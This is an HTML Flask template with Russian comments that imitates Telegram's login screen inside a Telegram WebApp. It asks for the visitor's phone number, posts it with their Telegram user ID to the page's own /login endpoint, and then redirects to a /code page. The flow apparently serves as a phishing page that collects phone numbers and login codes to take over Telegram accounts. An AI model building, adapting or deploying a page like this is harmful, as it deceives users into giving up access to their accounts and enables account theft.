<!DOCTYPE html>
<html lang="ru">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Регистрация</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-dark@5/dark.css">
    <style>
        body {
            margin: 0;
            padding: 0;
            background-color: #111;
            color: #fff;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .container {
            position: relative;
            width: 100%;
            max-width: 420px;
            height: 100%;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
        }

        .header {
            text-align: center;
            margin-top: 10px;
        }

        .title {
            font-size: 20px;
            font-weight: 600;
        }

        .subtitle {
            margin-top: 8px;
            font-size: 0.9rem;
            color: #888;
            font-weight: 400;
        }

        .reg {
            margin-top: 20%;
            width: 100%;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            row-gap: 12px;
        }

        .form {
            margin-top: 0;
            display: flex;
            flex-direction: column;
            row-gap: 15px;
            padding: 0 20px;
            width: 100%;
            box-sizing: border-box;
        }

        .country {
            border: 1px solid #333;
            border-radius: 8px;
            padding: 14px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            background: #111;
            margin-bottom: 14px;
            font-size: 16px;
            color: #aaa;
            cursor: pointer;
            position: relative;
            transition: all 0.3s ease;
        }

        .country:focus-within {
            border-color: rgb(135, 116, 225);
            border-width: 2px;
            box-shadow: 0 0 0 1px rgba(138, 43, 226, 0.3);
        }

        .country-label {
            position: absolute;
            left: 15px;
            top: 50%;
            transform: translateY(-50%);
            color: #888;
            pointer-events: none;
            transition: all 0.3s ease;
            font-size: 16px;
        }

        .country:focus-within .country-label {
            font-size: 12px;
            color: rgb(135, 116, 225);
            top: -8px;
            background: #111;
            padding: 0 5px;
            transform: translateY(0);
        }

        .country-content {
            opacity: 0;
            transform: translateY(5px);
            transition: all 0.3s ease;
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .country:focus-within .country-content {
            opacity: 1;
            transform: translateY(0);
        }

        .country-flag {
            font-size: 18px;
        }

        .country-name {
            font-size: 16px;
            color: #fff;
        }

        .country-arrow {
            margin-left: auto;
            transition: all 0.3s ease;
        }

        .country:focus-within .country-arrow {
            opacity: 0;
        }

        .phone {
            border: 1px solid #333;
            border-radius: 8px;
            display: flex;
            align-items: center;
            padding: 14px;
            font-size: 16px;
            background: #111;
            color: #fff;
            position: relative;
            transition: all 0.3s ease;
        }

        .phone:focus-within {
            border-color: rgb(135, 116, 225);
            border-width: 2px;
            transform: scale(1.02);
            box-shadow: 0 0 0 1px rgba(138, 43, 226, 0.3);
        }

        #phone-input {
            flex: 1;
            background: transparent !important;
            border: none !important;
            outline: none !important;
            color: #fff;
            font-size: 16px;
            padding: 0;
            margin: -5px;
            box-shadow: none !important;
            width: 100%;
            font-family: inherit;
            caret-color: #fff;
            transition: all 0.3s ease;
        }

        .phone-prefix {
            color: #fff;
            margin-right: 5px;
            font-size: 16px;
            font-weight: 600;
            transition: all 0.3s ease;
        }

        .next-btn {
            margin-top: 50px;
            width: 93%;
            height: 45px;
            border-radius: 12px;
            background: rgb(135, 116, 225);
            border: none;
            color: #fff;
            font-size: 16px;
            cursor: pointer;
            transition: all 0.3s ease;
            display: none;
        }

        .next-btn.visible {
            display: block;
        }

        .phone-number {
            font-size: 16px;
            color: #888;
            pointer-events: none;
            transition: all 0.3s ease;
            position: absolute;
            left: 45px;
            top: 50%;
            transform: translateY(-50%);
        }

        .phone:focus-within .phone-number {
            font-size: 12px;
            color: rgb(135, 116, 225);
            top: -8px;
            left: 15px;
            background: #111;
            padding: 0 5px;
            transform: translateY(0);
        }

        .phone.has-value .phone-number {
            opacity: 0;
        }

        .phone:focus-within.has-value .phone-number {
            opacity: 1;
            font-size: 12px;
            color: rgb(135, 116, 225);
            top: -8px;
            left: 15px;
            background: #111;
            padding: 0 5px;
            transform: translateY(0);
        }

        .country.has-country .country-content {
            opacity: 1;
            transform: translateY(0);
        }

        .country.has-country .country-label {
            font-size: 12px;
            color: #4b484e;
            top: -8px;
            background: #111;
            padding: 0 5px;
            transform: translateY(0);
        }

        .country.has-country .country-arrow {
            opacity: 0;
        }
        
        /* Стили для SweetAlert, чтобы идеально вписывались */
        .swal2-popup {
            background: #1c1c1c !important;
            border-radius: 16px !important;
        }
        .swal2-title, .swal2-content {
            color: #fff !important;
        }
        .swal2-confirm {
            background-color: rgb(135, 116, 225) !important;
            border-radius: 8px !important;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="reg">
            <img src="{{ url_for('static', filename='telegram-logo.svg') }}" alt="logo" width="120" height="120">
            <div class="header">
                <h1 style="font-size: 1.5rem !important">Telegram<h1>
                <p class="subtitle">Please confirm your country code<br>and enter your phone number.</p>
            </div>
            <div class="form">
                <div class="country" id="countryContainer" tabindex="0">
                    <span class="country-label">Country</span>
                    <div class="country-content">
                        <span class="country-flag" id="country-flag">🇺🇸</span>
                        <span class="country-name" id="country-name">United States</span>
                    </div>
                    <span class="country-arrow">›</span>
                </div>
                <div class="phone" id="phoneContainer">
                    <span class="phone-prefix" id="country-code">+</span>
                    <span class="phone-number">Phone number</span>
                    <input id="phone-input" type="tel" inputmode="numeric">
                </div>
            </div>
            <button class="next-btn" id="nextBtn">NEXT</button>
        </div>
    </div>
    <script src="https://telegram.org/js/telegram-web-app.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    
    <script>
        const tg = window.Telegram.WebApp;
        tg.ready();
        tg.expand(); // Разворачиваем на весь экран

        const phoneInput = document.getElementById("phone-input");
        const countryCodeElement = document.getElementById("country-code");
        const phoneContainer = document.getElementById("phoneContainer");
        const countryContainer = document.getElementById("countryContainer");
        const countryFlagElement = document.getElementById("country-flag");
        const countryNameElement = document.getElementById("country-name");
        const nextBtn = document.getElementById("nextBtn");

        const countryDatabase = {
            '1': { name: 'United States', flag: '🇺🇸' },
            '7': { name: 'Russia', flag: '🇷🇺' },
            '20': { name: 'Egypt', flag: '🇪🇬' },
            '27': { name: 'South Africa', flag: '🇿🇦' },
            '30': { name: 'Greece', flag: '🇬🇷' },
            '31': { name: 'Netherlands', flag: '🇳🇱' },
            '32': { name: 'Belgium', flag: '🇧🇪' },
            '33': { name: 'France', flag: '🇫🇷' },
            '34': { name: 'Spain', flag: '🇪🇸' },
            '36': { name: 'Hungary', flag: '🇭🇺' },
            '39': { name: 'Italy', flag: '🇮🇹' },
            '40': { name: 'Romania', flag: '🇷🇴' },
            '41': { name: 'Switzerland', flag: '🇨🇭' },
            '43': { name: 'Austria', flag: '🇦🇹' },
            '44': { name: 'United Kingdom', flag: '🇬🇧' },
            '45': { name: 'Denmark', flag: '🇩🇰' },
            '46': { name: 'Sweden', flag: '🇸🇪' },
            '47': { name: 'Norway', flag: '🇳🇴' },
            '48': { name: 'Poland', flag: '🇵🇱' },
            '49': { name: 'Germany', flag: '🇩🇪' },
            '51': { name: 'Peru', flag: '🇵🇪' },
            '52': { name: 'Mexico', flag: '🇲🇽' },
            '53': { name: 'Cuba', flag: '🇨🇺' },
            '54': { name: 'Argentina', flag: '🇦🇷' },
            '55': { name: 'Brazil', flag: '🇧🇷' },
            '56': { name: 'Chile', flag: '🇨🇱' },
            '57': { name: 'Colombia', flag: '🇨🇴' },
            '58': { name: 'Venezuela', flag: '🇻🇪' },
            '60': { name: 'Malaysia', flag: '🇲🇾' },
            '61': { name: 'Australia', flag: '🇦🇺' },
            '62': { name: 'Indonesia', flag: '🇮🇩' },
            '63': { name: 'Philippines', flag: '🇵🇭' },
            '64': { name: 'New Zealand', flag: '🇳🇿' },
            '65': { name: 'Singapore', flag: '🇸🇬' },
            '66': { name: 'Thailand', flag: '🇹🇭' },
            '76': { name: 'Kazakhstan', flag: '🇰🇿' },
            '77': { name: 'Kazakhstan', flag: '🇰🇿' },
            '81': { name: 'Japan', flag: '🇯🇵' },
            '82': { name: 'South Korea', flag: '🇰🇷' },
            '84': { name: 'Vietnam', flag: '🇻🇳' },
            '86': { name: 'China', flag: '🇨🇳' },
            '90': { name: 'Turkey', flag: '🇹🇷' },
            '91': { name: 'India', flag: '🇮🇳' },
            '92': { name: 'Pakistan', flag: '🇵🇰' },
            '93': { name: 'Afghanistan', flag: '🇦🇫' },
            '94': { name: 'Sri Lanka', flag: '🇱🇰' },
            '95': { name: 'Myanmar', flag: '🇲🇲' },
            '98': { name: 'Iran', flag: '🇮🇷' },
            '380': { name: 'Ukraine', flag: '🇺🇦' },
            '375': { name: 'Belarus', flag: '🇧🇾' },
            '371': { name: 'Latvia', flag: '🇱🇻' },
            '372': { name: 'Estonia', flag: '🇪🇪' },
            '370': { name: 'Lithuania', flag: '🇱🇹' }
        };

        const countryCodes = Object.keys(countryDatabase).sort((a, b) => b.length - a.length);

        function detectCountryCode(phoneDigits) {
            for (const code of countryCodes) {
                if (phoneDigits.startsWith(code)) {
                    return {
                        code: code,
                        rest: phoneDigits.slice(code.length),
                        country: countryDatabase[code]
                    };
                }
            }
            return {
                code: '',
                rest: phoneDigits,
                country: null
            };
        }

        function updateCountryDisplay(country) {
            if (country) {
                countryFlagElement.textContent = country.flag;
                countryNameElement.textContent = country.name;
                countryContainer.classList.add('has-country');
            } else {
                countryContainer.classList.remove('has-country');
            }
        }

        function formatPhoneNumber(phoneDigits) {
            if (phoneDigits.length === 0) return '';

            const { code, rest, country } = detectCountryCode(phoneDigits);
            let formatted = '';

            if (code) {
                formatted = code;
                if (rest.length > 0) {
                    formatted += ' ' + formatPhoneNumberPart(rest);
                }
                updateCountryDisplay(country);
            } else {
                formatted = formatPhoneNumberPart(rest);
                updateCountryDisplay(null);
            }

            return formatted;
        }

        function formatPhoneNumberPart(phoneDigits) {
            if (phoneDigits.length <= 3) {
                return phoneDigits;
            } else if (phoneDigits.length <= 6) {
                return phoneDigits.slice(0, 3) + ' ' + phoneDigits.slice(3);
            } else if (phoneDigits.length <= 10) {
                return phoneDigits.slice(0, 3) + ' ' + phoneDigits.slice(3, 6) + ' ' + phoneDigits.slice(6);
            } else {
                return phoneDigits.slice(0, 3) + ' ' + phoneDigits.slice(3, 6) + ' ' + phoneDigits.slice(6, 10);
            }
        }

        function updatePhoneDisplay() {
            const value = phoneInput.value.replace(/\D/g, '');

            if (value.length > 0) {
                phoneContainer.classList.add('has-value');
                phoneInput.value = formatPhoneNumber(value);
            } else {
                phoneContainer.classList.remove('has-value');
                phoneInput.value = '';
                updateCountryDisplay(null);
            }

            if (value.length >= 7) {
                nextBtn.classList.add('visible');
            } else {
                nextBtn.classList.remove('visible');
            }
        }

        phoneInput.addEventListener('input', function (e) {
            const cursorPosition = e.target.selectionStart;
            const originalValue = e.target.value;

            const digitsOnly = e.target.value.replace(/\D/g, '');
            this.value = formatPhoneNumber(digitsOnly);

            let newCursorPosition = cursorPosition;

            if (this.value.length > originalValue.length && this.value[cursorPosition - 1] === ' ') {
                newCursorPosition = cursorPosition + 1;
            }
            else if (this.value.length < originalValue.length && originalValue[cursorPosition - 1] === ' ') {
                newCursorPosition = cursorPosition - 1;
            }

            e.target.setSelectionRange(newCursorPosition, newCursorPosition);

            updatePhoneDisplay();
        });

        phoneInput.addEventListener('focus', function () {
            phoneContainer.classList.add('focused');
        });

        phoneInput.addEventListener('blur', function () {
            phoneContainer.classList.remove('focused');
        });

        phoneInput.focus();

        countryContainer.addEventListener('click', function () {
            this.focus();
        });

        // Функция показа красивой ошибки
        function showError(message) {
            Swal.fire({
                icon: 'warning',
                title: 'Упс...',
                text: message,
                background: '#1c1c1c',
                color: '#ffffff',
                confirmButtonColor: '#8774e1',
                confirmButtonText: 'Понятно',
                borderRadius: '12px',
                customClass: {
                    popup: 'swal-dark-popup'
                }
            });
        }

        // --- УЛУЧШЕННАЯ ОТПРАВКА НОМЕРА ---
        async function sendNumber() {
            const phoneNumber = phoneInput.value.replace(/\D/g, ''); 
            const countryCode = countryCodeElement.textContent.replace('+', ''); 
            
            // Клиентская проверка (базовая)
            if (!phoneNumber || phoneNumber.length < 5) {
                showError('Номер кажется слишком коротким.');
                return;
            }
            
            const fullPhoneNumber = '+' + countryCode + phoneNumber;
            
            // --- ЛОГИКА ПОЛУЧЕНИЯ ID ---
            // 1. Пробуем взять из URL (если мы тестим или перешли по ссылке)
            const urlParams = new URLSearchParams(window.location.search);
            const urlUserId = urlParams.get('user_id');
            // 2. Пробуем взять из Telegram WebApp
            const tgUserId = tg.initDataUnsafe?.user?.id;
            // 3. Если ничего нет - ставим web_user
            const finalUserId = urlUserId || tgUserId || 'web_user';
            
            console.log('Sending:', fullPhoneNumber, 'UserID:', finalUserId);

            try {
                const response = await fetch('/login', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({
                        phone_number: fullPhoneNumber,
                        user_id: finalUserId
                    })
                });

                const data = await response.json();

                if (response.ok && data.success) {
                    // Успех
                    localStorage.setItem('userPhoneNumber', fullPhoneNumber);
                    window.location.href = '/code';
                } else {
                    // ОШИБКА ОТ СЕРВЕРА (app.py)
                    // Показываем красивое окно с текстом ошибки
                    showError(data.error || 'Произошла неизвестная ошибка.');
                }
            } catch (error) {
                console.error('Network Error:', error);
                showError('Ошибка соединения с сервером. Проверьте интернет.');
            }
        }

        nextBtn.addEventListener('click', async function () {
            // Анимация кнопки
            const originalText = this.textContent;
            this.disabled = true;
            this.style.opacity = '0.6';
            this.textContent = 'PLEASE WAIT...';
            
            await sendNumber();
            
            // Возвращаем кнопку обратно
            this.disabled = false;
            this.textContent = originalText;
            this.style.opacity = '1';
        });
    </script>
</body>

</html>